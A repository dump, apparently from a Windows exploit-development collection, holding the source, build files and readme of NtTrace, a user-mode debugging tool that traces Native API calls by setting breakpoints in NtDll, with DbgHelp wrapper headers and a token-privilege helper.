$< 38 | 39 | .rc.res: 40 | rc -r /Iinclude $(*B) 41 | 42 | NtTrace.exe : build\$(*B).obj $(*B).res 43 | cl $(CCFLAGS) /Fe$@ $** $(LINKFLAGS) 44 | if exist $(@).manifest mt.exe -nologo -manifest $(@).manifest -outputresource:$@ 45 | 46 | # Dependencies 47 | 48 | build\NtTrace.obj : "include\DebugPriv.h" \ 49 | "include\AdjustPriv.h" \ 50 | "include\displayError.h" \ 51 | "include\displayError.inl" \ 52 | "include\Options.h" \ 53 | "include\Options.inl" \ 54 | "include\ProcessHelper.h" \ 55 | "include\NtDllStruct.h" \ 56 | "include\SimpleTokenizer.h" \ 57 | "include\MsvcExceptions.h" \ 58 | include\DebugDriver.h \ 59 | include\EntryPoint.h \ 60 | include\ShowData.h \ 61 | include\TrapNtOpcodes.h 62 | 63 | NtTrace.res: $(*B).rc "version.rc" 64 | 65 | NtTrace.exe : build\DebugDriver.obj build\EntryPoint.obj build\Enumerations.obj build\ShowData.obj \ 66 | build\GetFileNameFromHandle.obj build\GetModuleBase.obj build\SymbolEngine.obj 67 | 68 | build\DebugDriver.obj : \ 69 | "include\displayError.h" \ 70 | "include\displayError.inl" \ 71 | "include\DebugDriver.h" 72 | 73 | build\EntryPoint.obj : \ 74 | "include\displayError.h" \ 75 | "include\displayError.inl" \ 76 | "include\DbgHelper.h" \ 77 | "include\DbgHelper.inl" \ 78 | "include\SymbolEngine.h" \ 79 | "include\TrapNtOpcodes.h" \ 80 | "include\ShowData.h" 81 | 82 | build\ShowData.obj: \ 83 | "include\Enumerations.h" \ 84 | "include\NtDllStruct.h" \ 85 | "include\MsvcExceptions.h" \ 86 | "include\ReadPartialMemory.h" \ 87 | "include\ShowData.h" 88 | 89 | build\GetModuleBase.obj: include\GetModuleBase.h 90 | 91 | build\SymbolEngine.obj: \ 92 | "include/SymbolEngine.h" \ 93 | "include/DbgHelper.h" \ 94 | "include/DbgHelper.inl" \ 95 | "include/StrFromWchar.h" \ 96 | "include/MSvcExceptions.h" \ 97 | "include/BasicType.h" 98 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/NtTrace.rc: 
-------------------------------------------------------------------------------- 1 | // Resource file for NtTrace 2 | // 3 | // $Id: NtTrace.rc 1440 2014-10-07 23:24:21Z Roger $ 4 | 5 | #define MINOR_VERSION 1439 6 | #define DESCRIPTION "Trace Native API calls made by a process" 7 | #define APPLICATION 8 | 9 | 1 ICON "NtTrace.ico" 10 | 11 | #include "version.rc" 12 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/Readme.txt: -------------------------------------------------------------------------------- 1 | NtTrace readme file 2 | =================== 3 | 4 | Contents 5 | -------- 6 | 7 | Readme.txt - This file 8 | NtTrace.cfg - Configuration file for NtTrace 9 | NtTrace.exe - Built EXE, if you don't want to build it yourself 10 | NtTrace.ico - icon file 11 | NtTrace.mak - make file for Microsoft Visual Studio command prompt 12 | NtTrace.rc - resource file 13 | src - source files 14 | include - include files 15 | version.rc - version resource 16 | dbgCopy.dll - copied and renamed version of DbgHelp.dll from Microsoft "Debugging Tools for windows" 17 | dbgCopy.lib - library mapping DbgHelp calls to dbgCopy instead 18 | 19 | Build instructions 20 | ------------------ 21 | 22 | For Visual Studio versions since VC6: 23 | - start a "Visual Studio command prompt", 24 | - cd to this directory 25 | - run 'nmake /f NtTrace.mak' 26 | 27 | Visual Studio 6 28 | --------------- 29 | 30 | The platform SDK shipped with Visual Studio 6 did not include the Psapi and DbgHelp headers 31 | and libraries used by the program. 32 | 33 | You need to download and install a newer version of the platform SDK, and ensure the include 34 | path has the platform SDK include directory *before* the VC6 ones. 35 | 36 | 64bit builds 37 | ------------ 38 | 39 | The 64bit version of NtTrace builds in the amd64 environment. 
40 | 41 | This can be selected using, for example: 42 | "C:\Program Files\Microsoft Visual Studio 10.0\VC\vcvarsall.bat" amd64 43 | 44 | Note: it requires the dbgcopy.lib/.dll from the 64bit ZIP file. 45 | 46 | Note on DbgCopy.dll/lib 47 | ----------------------- 48 | 49 | Windows ships with DbgHelp.dll in the system32 directory. 50 | However, newer versions of this DLL are packaged with "Debugging Tools for Windows" 51 | (See http://www.microsoft.com/whdc/DevTools/Debugging/default.mspx) 52 | 53 | The problem with this mechanism is that the version installed with the OS tends to 54 | take precedence over newer versions that may be downloaded. 55 | 56 | My solution is to create a library, dbgCopy.lib, that maps the entry points from DbgHelp.dll 57 | to dbgCopy.dll. The file dbgcopy.dll is simply a renamed copy of the latest DbgHelp.dll, but 58 | it can now be placed anywhere on the PATH without conflicting with the OS-provided DbgHelp.dll (since it is located by name through the PATH, keep it in a directory that other users cannot write to). 59 | 60 | Running NtTrace 61 | --------------- 62 | 63 | NtTrace is designed to run from the command line. 64 | 65 | It can be used to execute a program, with arguments if needed. 66 | For example: 67 | NtTrace -filter File cmd 68 | 69 | or to attach to an existing process by PID or, using the -a option, by name. 70 | For example: 71 | NtTrace 1234 72 | or 73 | NtTrace -a notepad 74 | 75 | Run NtTrace -h for a complete list of options. 76 | 77 | How it works 78 | ------------ 79 | 80 | 1. Technology 81 | 82 | NtTrace works by using the Windows debug interface to place breakpoints in NtDll around the native Windows calls into the kernel. 83 | Each time a breakpoint is hit NtTrace reads the arguments passed to/values returned by the associated call. 84 | Note: it does not attempt to trap the native graphics calls that are made to Win32k.sys 85 | 86 | It works at user level and only affects the specific process (and its children). No attempt is made to go into the kernel. 
87 | This was a deliberate design decision as it means the tool can be used without requiring administrative rights 88 | or permission to install device drivers. 89 | However this also means the tool will not catch: 90 | * kernel calls made by device drivers on behalf of an application 91 | * any direct use of the int 2e or syscall mechanism (i.e. code that bypasses the NtDll stubs where the breakpoints are placed) 92 | 93 | NtTrace also traces into child processes of the initial process started; the -pid option will add the process Id to each output line. 94 | 95 | It also deals with multi-threaded applications (and the -tid option will help identify which thread is making each call). 96 | Note, however, that since the Windows debug interface is event based, if multiple threads all make calls simultaneously 97 | then the tracing will be serialised. 98 | 99 | 2. Configuration 100 | 101 | The configuration for the native calls is held in NtTrace.cfg and this file is parsed when the program starts up. 102 | Note that different versions of Windows support different sets of calls. 103 | 104 | Some of the Native functions are officially documented by Microsoft but many are undocumented. 105 | The complete list was arrived at by a combination of detective work on the functions and from web sites, such as ReactOS. 106 | 107 | Each function is assigned to a category, and filtering can be done by function name (partial match) and function category. 108 | 109 | By default NtTrace traces on return from the system call, but the -pre option can be used to trace before the call as well. 110 | This can be useful if, for example, the same structure is used for a request and a response buffer. 
111 | 112 | -- 113 | $Id: Readme.txt 929 2011-11-05 18:20:24Z Roger $ 114 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/dbgCopy.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/dbgCopy.dll -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/dbgCopy.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/dbgCopy.lib -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/AdjustPriv.h: -------------------------------------------------------------------------------- 1 | #ifndef ADJUST_PRIV_H_ 2 | #define ADJUST_PRIV_H_ 3 | 4 | /**@file 5 | 6 | Function to grant a single privilege to a process. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 
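$Revision: 1405 $
*/

// $Id: AdjustPriv.h 1405 2013-11-12 23:57:17Z Roger $

namespace or2
{

/**
 * Attempt to enable the named privilege in the access token of the specified process.
 *
 * This only toggles on a privilege the token already holds (disabled); it cannot
 * add a privilege the token was never granted.
 *
 * @param lpName    name of the privilege (an SE_*_NAME constant from winnt.h)
 * @param hProcess  process whose token is adjusted; defaults to the current process
 *
 * @return
 *   - TRUE  - the privilege is now enabled
 *   - FALSE - failure [typically the token does not hold the privilege, which
 *             AdjustTokenPrivileges reports as ERROR_NOT_ALL_ASSIGNED]
 */

BOOL
inline
EnableNamedPriv (
    LPCTSTR lpName,                        ///< name for the privilege token (from winnt.h)
    HANDLE hProcess = GetCurrentProcess()  ///< handle of the process to which to give the privilege
    )
{
    HANDLE hToken = NULL;
    LUID privValue;
    TOKEN_PRIVILEGES tkp;

    //
    // Retrieve a handle of the access token
    //
    if (!OpenProcessToken( hProcess,
            TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
            &hToken))
    {
        std::cerr << "OpenProcessToken failed with: " << ::GetLastError() << std::endl;
        return FALSE;
    }

    // From here on hToken is open and must be closed on every path
    // (the original leaked it on both the success and failure paths).
    BOOL bRet = FALSE;

    if (!LookupPrivilegeValue((LPSTR) NULL,
            lpName,
            &privValue))
    {
        std::cerr << "LookupPrivilegeValue failed with: " << GetLastError() << std::endl;
    }
    else
    {
        //
        // Enable the privilege
        //
        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Luid = privValue;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        AdjustTokenPrivileges(hToken,
            FALSE,
            &tkp,
            sizeof(TOKEN_PRIVILEGES),
            (PTOKEN_PRIVILEGES) NULL,
            (PDWORD) NULL);

        //
        // The return value of AdjustTokenPrivileges couldn't be tested on older NT versions,
        // and even a non-zero return leaves ERROR_NOT_ALL_ASSIGNED in the last error when the
        // token does not hold the privilege, so the last-error code is what is checked.
        //
        DWORD lastError = GetLastError();
        if ( lastError == ERROR_SUCCESS )
        {
            bRet = TRUE;
        }
        else if ( lastError != ERROR_NOT_ALL_ASSIGNED )
        {
            std::cerr << "AdjustTokenPrivileges failed with: " << lastError << std::endl;
        }
        // ERROR_NOT_ALL_ASSIGNED: can't enable a permission we haven't got - fail quietly
    }

    ::CloseHandle( hToken );

    return bRet;
}

}

#endif // ADJUST_PRIV_H_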
-------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/BasicType.h: -------------------------------------------------------------------------------- 1 | #ifndef BASICTYPE_H_ 2 | #define BASICTYPE_H_ 3 | 4 | /** Enumerations extracted from CvConst.h in "Visual Studio SDKs\DIA SDK" */ 5 | 6 | // $Id: BasicType.h 383 2008-06-12 23:00:22Z Roger $ 7 | 8 | 9 | /** Enumeration for function call type */ 10 | typedef enum CV_call_e { 11 | CV_CALL_NEAR_C = 0x00, // near right to left push, caller pops stack 12 | CV_CALL_FAR_C = 0x01, // far right to left push, caller pops stack 13 | CV_CALL_NEAR_PASCAL = 0x02, // near left to right push, callee pops stack 14 | CV_CALL_FAR_PASCAL = 0x03, // far left to right push, callee pops stack 15 | CV_CALL_NEAR_FAST = 0x04, // near left to right push with regs, callee pops stack 16 | CV_CALL_FAR_FAST = 0x05, // far left to right push with regs, callee pops stack 17 | CV_CALL_SKIPPED = 0x06, // skipped (unused) call index 18 | CV_CALL_NEAR_STD = 0x07, // near standard call 19 | CV_CALL_FAR_STD = 0x08, // far standard call 20 | CV_CALL_NEAR_SYS = 0x09, // near sys call 21 | CV_CALL_FAR_SYS = 0x0a, // far sys call 22 | CV_CALL_THISCALL = 0x0b, // this call (this passed in register) 23 | CV_CALL_MIPSCALL = 0x0c, // Mips call 24 | CV_CALL_GENERIC = 0x0d, // Generic call sequence 25 | CV_CALL_ALPHACALL = 0x0e, // Alpha call 26 | CV_CALL_PPCCALL = 0x0f, // PPC call 27 | CV_CALL_SHCALL = 0x10, // Hitachi SuperH call 28 | CV_CALL_ARMCALL = 0x11, // ARM call 29 | CV_CALL_AM33CALL = 0x12, // AM33 call 30 | CV_CALL_TRICALL = 0x13, // TriCore Call 31 | CV_CALL_SH5CALL = 0x14, // Hitachi SuperH-5 call 32 | CV_CALL_M32RCALL = 0x15, // M32R Call 33 | CV_CALL_CLRCALL = 0x16, // clr call 34 | CV_CALL_RESERVED = 0x17 // first unused call enumeration 35 | 36 | // Do NOT add any more machine specific conventions. This is to be used for 37 | // calling conventions in the source only (e.g. 
__cdecl, __stdcall). 38 | } CV_call_e; 39 | 40 | /** TI_GET_DATAKIND values */ 41 | enum DataKind 42 | { 43 | DataIsUnknown, 44 | DataIsLocal, 45 | DataIsStaticLocal, 46 | DataIsParam, 47 | DataIsObjectPtr, 48 | DataIsFileStatic, 49 | DataIsGlobal, 50 | DataIsMember, 51 | DataIsStaticMember, 52 | DataIsConstant 53 | }; 54 | 55 | /** Basic types */ 56 | enum BasicType 57 | { 58 | btNoType = 0, 59 | btVoid = 1, 60 | btChar = 2, 61 | btWChar = 3, 62 | btInt = 6, 63 | btUInt = 7, 64 | btFloat = 8, 65 | btBCD = 9, 66 | btBool = 10, 67 | btLong = 13, 68 | btULong = 14, 69 | btCurrency = 25, 70 | btDate = 26, 71 | btVariant = 27, 72 | btComplex = 28, 73 | btBit = 29, 74 | btBSTR = 30, 75 | btHresult = 31 76 | }; 77 | 78 | #endif // BASICTYPE_H_ 79 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/DbgHelper.h: -------------------------------------------------------------------------------- 1 | #ifndef DBGHELPER_H_ 2 | #define DBGHELPER_H_ 3 | 4 | /** 5 | @file 6 | Helper for wrapping calls to the Microsoft DbgHelp.dll. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 
23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: DbgHelper.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #include 30 | 31 | #include "SymTagEnum.h" 32 | 33 | #if(WINVER < 0x0500) 34 | // Check for original VC6 SDK 35 | #error "Windows 2000 or higher platform SDK required" 36 | #endif 37 | 38 | #include 39 | 40 | // If we use imagehlp.lib then 41 | // (A) we must copy the imagehlp.dll to the location of the exe on NT 4.0 42 | // (B) because dbghelp.dll is loaded dynamically it will always be loaded from WntNt\System32 43 | // on Windows 2000 and so you can't use the later versions from "Debugging Tools for Windows". 44 | // 45 | // If we use dbgHelp.lib we tend to get the one in WINNT\SYSTEM32 46 | // So I use a 'copy': dbgCopy.lib which links to dbgCopy.dll, which in turn 47 | // is just a copy and rename of the latest dbgHelp.dll 48 | 49 | #pragma comment( lib, "dbgCopy.lib" ) 50 | 51 | #include 52 | 53 | #ifdef SSRVOPT_TRACE // identifies newer DbgHelp.h (!) 54 | #define DBGHELP_6_1_APIS 55 | #endif 56 | 57 | #ifdef DBGHELP_6_1_APIS 58 | 59 | /** Helper for streaming SymTagEnum values */ 60 | std::ostream& operator<<( std::ostream& os, enum SymTagEnum const value ); 61 | 62 | #endif // DBGHELP_6_1_APIS 63 | 64 | namespace or2 65 | { 66 | 67 | /** Class to assist with DbgHelp API */ 68 | class DbgHelper 69 | { 70 | public: 71 | /** Construct a helper object. */ 72 | DbgHelper(); 73 | 74 | /** Destroy and clean up. */ 75 | virtual ~DbgHelper(); 76 | 77 | /** Initalise the object to access the specified process. */ 78 | BOOL Initialise( HANDLE hProcess ); 79 | 80 | /** Clean up data structures for the current process. */ 81 | BOOL Cleanup(); 82 | 83 | /** Get module information for the input address. */ 84 | BOOL GetModuleInfo64( DWORD64 dwAddr, PIMAGEHLP_MODULE64 ModuleInfo ) const; 85 | 86 | /** Load the module base information for the input address. */ 87 | DWORD64 GetModuleBase64( DWORD64 dwAddr ) const; 88 | 89 | /** Load information for a module. 
*/ 90 | BOOL LoadModule64( HANDLE hFile, PCSTR ImageName, PCSTR ModuleName, DWORD64 BaseOfDll, DWORD SizeOfDll ) const; 91 | 92 | /** Unload information for a module */ 93 | BOOL UnloadModule64( DWORD64 BaseOfDll ); 94 | 95 | /** Get line number information for the input address. */ 96 | BOOL GetLineFromAddr64( DWORD64 dwAddr, PDWORD pdwDisplacement, PIMAGEHLP_LINE64 Line ) const; 97 | 98 | /** Get the process currently being debugged. */ 99 | HANDLE GetProcess() const; 100 | 101 | #ifndef DBGHELP_6_1_APIS 102 | 103 | /** Get symbolic information for the input address. */ 104 | BOOL GetSymFromAddr64( DWORD dwAddr, PDWORD64 pdwDisplacement, PIMAGEHLP_SYMBOL64 Symbol ) const; 105 | 106 | #else 107 | 108 | // Version 6.1 APIs 109 | 110 | /** Get symbol for specific address. */ 111 | BOOL SymFromAddr( DWORD64 Address, PDWORD64 Displacement, PSYMBOL_INFO Symbol ) const; 112 | 113 | /** Get symbol for a name */ 114 | BOOL SymFromName( PCSTR Name, PSYMBOL_INFO Symbol ) const; 115 | 116 | /** Get type info from a type ID. */ 117 | BOOL GetTypeInfo( DWORD64 ModBase, ULONG TypeId, IMAGEHLP_SYMBOL_TYPE_INFO GetType, PVOID pInfo ) const; 118 | 119 | /** Get type info from a name. */ 120 | BOOL GetTypeFromName( ULONG64 BaseOfDll, PCTSTR Name, PSYMBOL_INFO Symbol ) const; 121 | 122 | /** The SetContext function sets context information used by the SymEnumSymbols function. */ 123 | BOOL SetContext( PIMAGEHLP_STACK_FRAME StackFrame, PIMAGEHLP_CONTEXT Context ) const; 124 | 125 | /** The EnumSymbols function enumerates all symbols in a process. */ 126 | BOOL EnumSymbols( ULONG64 BaseOfDll, PCSTR Mask, PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, PVOID UserContext ) const; 127 | 128 | /** The EnumTypes function enumerates all types in a process. */ 129 | BOOL EnumTypes( ULONG64 BaseOfDll, PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, PVOID UserContext ) const; 130 | 131 | /** Test whether EnumSymbols API is available. 
*/ 132 | BOOL IsEnumSymbolsAvailable() const; 133 | 134 | /** Write a mini-dump */ 135 | BOOL WriteMiniDump( DWORD processId, HANDLE hFile, MINIDUMP_TYPE DumpType, 136 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, PMINIDUMP_CALLBACK_INFORMATION CallbackParam ); 137 | 138 | #endif // DBGHELP_6_1_APIS 139 | 140 | private: 141 | // suppress copy and assign 142 | DbgHelper( DbgHelper const & ); 143 | DbgHelper& operator=( DbgHelper const & ); 144 | 145 | HANDLE m_hProcess; // Current process being debugged 146 | }; 147 | 148 | /** Helper struct to zero initialise POD classes */ 149 | template 150 | struct DbgInit : public T 151 | { 152 | /** Constructor sets the base class to zeroes */ 153 | DbgInit() 154 | { 155 | ::memset( static_cast(this), 0, sizeof( T ) ); 156 | SizeOfStruct = sizeof( T ); 157 | } 158 | }; 159 | 160 | } 161 | 162 | // inline implementation 163 | #include "DbgHelper.inl" 164 | 165 | #endif // DBGHELPER_H_ 166 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/DbgHelper.inl: -------------------------------------------------------------------------------- 1 | #ifndef DBGHELPER_INL_ 2 | #define DBGHELPER_INL_ 3 | 4 | /* 5 | Provide helper functions for DbgHelp DLL. 6 | 7 | @author Roger Orr 8 | 9 | Copyright © 2003. 10 | This software is distributed in the hope that it will be useful, but 11 | without WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 13 | 14 | Permission is granted to anyone to make or distribute verbatim 15 | copies of this software provided that the copyright notice and 16 | this permission notice are preserved, and that the distributor 17 | grants the recipient permission for further distribution as permitted 18 | by this notice. 19 | 20 | Comments and suggestions are always welcome. 21 | Please report bugs to rogero@howzatt.demon.co.uk. 
22 | 23 | $Revision: 1405 $ 24 | */ 25 | 26 | // $Id: DbgHelper.inl 1405 2013-11-12 23:57:17Z Roger $ 27 | 28 | #include 29 | 30 | #ifdef DBGHELP_6_1_APIS 31 | 32 | #define DBGCOPY_DLL "dbgCopy" // Use a copy of dbgHelp.dll to avoid DLL hell 33 | 34 | /** Helper for streaming SymTagEnum values */ 35 | inline 36 | std::ostream& operator<<( std::ostream& os, enum SymTagEnum const value ) 37 | { 38 | #define DEF(X) { X, #X } 39 | 40 | static struct 41 | { 42 | int value; 43 | char const * name; 44 | } enumValues[] = 45 | { 46 | DEF(SymTagNull), 47 | DEF(SymTagExe), 48 | DEF(SymTagCompiland), 49 | DEF(SymTagCompilandDetails), 50 | DEF(SymTagCompilandEnv), 51 | DEF(SymTagFunction), 52 | DEF(SymTagBlock), 53 | DEF(SymTagData), 54 | DEF(SymTagAnnotation), 55 | DEF(SymTagLabel), 56 | DEF(SymTagPublicSymbol), 57 | DEF(SymTagUDT), 58 | DEF(SymTagEnum), 59 | DEF(SymTagFunctionType), 60 | DEF(SymTagPointerType), 61 | DEF(SymTagArrayType), 62 | DEF(SymTagBaseType), 63 | DEF(SymTagTypedef), 64 | DEF(SymTagBaseClass), 65 | DEF(SymTagFriend), 66 | DEF(SymTagFunctionArgType), 67 | DEF(SymTagFuncDebugStart), 68 | DEF(SymTagFuncDebugEnd), 69 | DEF(SymTagUsingNamespace), 70 | DEF(SymTagVTableShape), 71 | DEF(SymTagVTable), 72 | DEF(SymTagCustom), 73 | DEF(SymTagThunk), 74 | DEF(SymTagCustomType), 75 | DEF(SymTagManagedType), 76 | DEF(SymTagDimension), 77 | DEF(SymTagMax), 78 | { 0,0 }}; 79 | 80 | #undef DEF 81 | 82 | for ( int idx = 0; enumValues[idx].name != 0; ++idx ) 83 | { 84 | if ( enumValues[idx].value == value ) 85 | { 86 | return os << enumValues[idx].name; 87 | } 88 | } 89 | 90 | return os << value; 91 | } 92 | 93 | #endif // DBGHELP_6_1_APIS 94 | 95 | namespace or2 96 | { 97 | 98 | /** Constructor */ 99 | inline 100 | DbgHelper::DbgHelper() 101 | : m_hProcess(0) 102 | {} 103 | 104 | /** Destructor */ 105 | inline 106 | DbgHelper::~DbgHelper() 107 | { 108 | Cleanup(); 109 | } 110 | 111 | /** Initialise (only called once) */ 112 | inline 113 | BOOL DbgHelper::Initialise( 
HANDLE hProcess ) 114 | { 115 | BOOL bRet = ::SymInitialize( hProcess, 0, false ); 116 | if ( bRet ) 117 | { 118 | m_hProcess = hProcess; 119 | } 120 | return bRet; 121 | } 122 | 123 | /** Clean up */ 124 | inline 125 | BOOL DbgHelper::Cleanup() 126 | { 127 | BOOL bRet = false; 128 | if ( m_hProcess ) 129 | { 130 | bRet = ::SymCleanup( m_hProcess ); 131 | m_hProcess = 0; 132 | } 133 | 134 | return bRet; 135 | } 136 | 137 | inline 138 | BOOL DbgHelper::GetModuleInfo64( DWORD64 dwAddr, PIMAGEHLP_MODULE64 ModuleInfo ) const 139 | { 140 | return ::SymGetModuleInfo64( m_hProcess, dwAddr, ModuleInfo ); 141 | } 142 | 143 | inline 144 | DWORD64 DbgHelper::GetModuleBase64( DWORD64 dwAddr ) const 145 | { 146 | return ::SymGetModuleBase64( m_hProcess, dwAddr ) ; 147 | } 148 | 149 | inline 150 | BOOL DbgHelper::LoadModule64( HANDLE hFile, PCSTR ImageName, PCSTR ModuleName, DWORD64 BaseOfDll, DWORD SizeOfDll ) const 151 | { 152 | // Use const_cast to support older dbghelp.h header files which aren't as const correct. 
153 | return ::SymLoadModule64( m_hProcess, hFile, const_cast(ImageName), const_cast(ModuleName), BaseOfDll, SizeOfDll ) != 0; 154 | } 155 | 156 | inline 157 | BOOL DbgHelper::UnloadModule64( DWORD64 BaseOfDll ) 158 | { 159 | return SymUnloadModule64( m_hProcess, BaseOfDll ); 160 | } 161 | 162 | inline 163 | BOOL DbgHelper::GetLineFromAddr64( DWORD64 dwAddr, PDWORD pdwDisplacement, PIMAGEHLP_LINE64 Line ) const 164 | { 165 | return ::SymGetLineFromAddr64( m_hProcess, dwAddr, pdwDisplacement, Line ); 166 | } 167 | 168 | inline 169 | HANDLE DbgHelper::GetProcess() const 170 | { 171 | return m_hProcess; 172 | } 173 | 174 | #ifndef DBGHELP_6_1_APIS 175 | 176 | inline 177 | BOOL DbgHelper::GetSymFromAddr64( DWORD dwAddr, PDWORD64 pdwDisplacement, PIMAGEHLP_SYMBOL64 Symbol ) const 178 | { 179 | return ::SymGetSymFromAddr64( m_hProcess, dwAddr, pdwDisplacement, Symbol ); 180 | } 181 | 182 | #else 183 | 184 | // Version 6.1 APIs 185 | 186 | #define DYN_LOAD( SYMBOL ) static SYMBOL *pfn##SYMBOL = \ 187 | (SYMBOL*) ::GetProcAddress( ::GetModuleHandle( DBGCOPY_DLL ), #SYMBOL ); 188 | 189 | /** Get symbol for specific address */ 190 | inline 191 | BOOL DbgHelper::SymFromAddr( DWORD64 Address, PDWORD64 Displacement, PSYMBOL_INFO Symbol ) const 192 | { 193 | typedef 194 | BOOL 195 | IMAGEAPI 196 | SymFromAddr( 197 | IN HANDLE hProcess, 198 | IN DWORD64 Address, 199 | OUT PDWORD64 Displacement, 200 | IN OUT PSYMBOL_INFO Symbol 201 | ); 202 | 203 | DYN_LOAD( SymFromAddr ); 204 | 205 | BOOL bRet = false; 206 | 207 | if ( pfnSymFromAddr ) 208 | { 209 | bRet = pfnSymFromAddr( m_hProcess, Address, Displacement, Symbol ); 210 | // Displacement is incorrect for some PDB files (linker optimization?) 
211 | if ( bRet && Displacement && Symbol && Symbol->Address ) 212 | { 213 | *Displacement = Address - Symbol->Address; 214 | } 215 | } 216 | 217 | return bRet; 218 | } 219 | 220 | /** Get symbol for name */ 221 | inline 222 | BOOL DbgHelper::SymFromName( PCSTR Name, PSYMBOL_INFO Symbol ) const 223 | { 224 | typedef 225 | BOOL 226 | IMAGEAPI 227 | SymFromName( 228 | IN HANDLE hProcess, 229 | IN PCSTR Name, 230 | IN OUT PSYMBOL_INFO Symbol 231 | ); 232 | 233 | DYN_LOAD( SymFromName ); 234 | 235 | BOOL bRet = false; 236 | 237 | if ( pfnSymFromName ) 238 | { 239 | bRet = pfnSymFromName( m_hProcess, Name, Symbol ); 240 | } 241 | 242 | return bRet; 243 | } 244 | 245 | /** Get type info from a type ID */ 246 | inline 247 | BOOL DbgHelper::GetTypeInfo( DWORD64 ModBase, ULONG TypeId, IMAGEHLP_SYMBOL_TYPE_INFO GetType, PVOID pInfo ) const 248 | { 249 | typedef 250 | BOOL 251 | IMAGEAPI 252 | SymGetTypeInfo( 253 | IN HANDLE hProcess, 254 | IN DWORD64 ModBase, 255 | IN ULONG TypeId, 256 | IN IMAGEHLP_SYMBOL_TYPE_INFO GetType, 257 | OUT PVOID pInfo 258 | ); 259 | 260 | DYN_LOAD( SymGetTypeInfo ); 261 | 262 | BOOL bRet = false; 263 | 264 | if ( pfnSymGetTypeInfo ) 265 | { 266 | bRet = pfnSymGetTypeInfo( m_hProcess, ModBase, TypeId, GetType, pInfo ); 267 | } 268 | 269 | return bRet; 270 | } 271 | 272 | /** Get type info from a name. */ 273 | inline 274 | BOOL DbgHelper::GetTypeFromName( DWORD64 ModBase, PCTSTR Name, PSYMBOL_INFO Symbol ) const 275 | { 276 | typedef 277 | BOOL 278 | IMAGEAPI 279 | SymGetTypeFromName( 280 | IN HANDLE hProcess, 281 | IN DWORD64 ModBase, 282 | IN PCTSTR Name, 283 | IN PSYMBOL_INFO Symbol 284 | ); 285 | 286 | DYN_LOAD( SymGetTypeFromName ); 287 | 288 | BOOL bRet = false; 289 | 290 | if ( pfnSymGetTypeFromName ) 291 | { 292 | bRet = pfnSymGetTypeFromName( m_hProcess, ModBase, Name, Symbol ); 293 | } 294 | 295 | return bRet; 296 | } 297 | 298 | 299 | /** The SetContext function sets context information used by the SymEnumSymbols function. 
*/ 300 | inline 301 | BOOL DbgHelper::SetContext( PIMAGEHLP_STACK_FRAME StackFrame, PIMAGEHLP_CONTEXT Context ) const 302 | { 303 | typedef 304 | BOOL 305 | IMAGEAPI 306 | SymSetContext( 307 | HANDLE hProcess, 308 | PIMAGEHLP_STACK_FRAME StackFrame, 309 | PIMAGEHLP_CONTEXT Context 310 | ); 311 | 312 | DYN_LOAD( SymSetContext ); 313 | 314 | BOOL bRet = false; 315 | 316 | if ( pfnSymSetContext ) 317 | { 318 | bRet = pfnSymSetContext( m_hProcess, StackFrame, Context ); 319 | } 320 | 321 | return bRet; 322 | } 323 | 324 | /** The EnumSymbols function enumerates all symbols in a process. */ 325 | inline 326 | BOOL DbgHelper::EnumSymbols( ULONG64 BaseOfDll, PCSTR Mask, PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, PVOID UserContext ) const 327 | { 328 | typedef 329 | BOOL 330 | IMAGEAPI 331 | SymEnumSymbols( 332 | HANDLE hProcess, 333 | ULONG64 BaseOfDll, 334 | PCSTR Mask, 335 | PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, 336 | PVOID UserContext 337 | ); 338 | 339 | DYN_LOAD( SymEnumSymbols ); 340 | 341 | BOOL bRet = false; 342 | 343 | if ( pfnSymEnumSymbols ) 344 | { 345 | bRet = pfnSymEnumSymbols( m_hProcess, BaseOfDll, Mask, EnumSymbolsCallback, UserContext ); 346 | } 347 | 348 | return bRet; 349 | } 350 | 351 | /** The EnumTypes function 